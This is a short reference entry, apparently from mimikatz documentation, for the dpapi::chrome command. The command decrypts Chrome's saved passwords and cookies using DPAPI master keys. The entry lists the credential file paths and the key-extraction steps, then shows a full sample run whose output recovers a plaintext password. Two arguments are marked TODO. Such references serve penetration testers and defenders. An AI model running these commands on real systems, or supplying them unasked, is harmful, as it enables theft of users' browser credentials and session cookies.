dpapi::chrome dumps stored credentials and cookies from Chrome. It has the following command line arguments:
  • in: the C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Login Data for the saves logins and the C:\Users<UserName>\AppData\Local\Google\Chrome\User Data\Default\Cookies for the cookies
  • key: it is the key output value of the dpapi::masterkey in:"C:\Users\<UserName>\AppData\Roaming\Microsoft\Protect\SID\MasterKey_ID" /rpc. it is useful for offline dumping of Chrome. CoreSecurity has published an excellent guide on how this can be accomplished offline
  • state: TODO
  • encryptedkey: TODO
  • /password: the user's password to use for decryption
  • /masterkey: the masterkey to use for decryption. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decryption results on screen
mimikatz # dpapi::chrome /in:"C:\Users\m3g9tr0n\AppData\Local\Google\Chrome\User Data\Default\Login Data" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
> Encrypted Key found in local state file
> Encrypted Key seems to be protected by DPAPI
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
* masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
> AES Key is: fd0635bf2e19d76231f649f48f4a90df3de80d3f83aa5ad016b3155fdab37fa2
URL : ( )
* using BCrypt with AES-256-GCM
Password: MySecretPass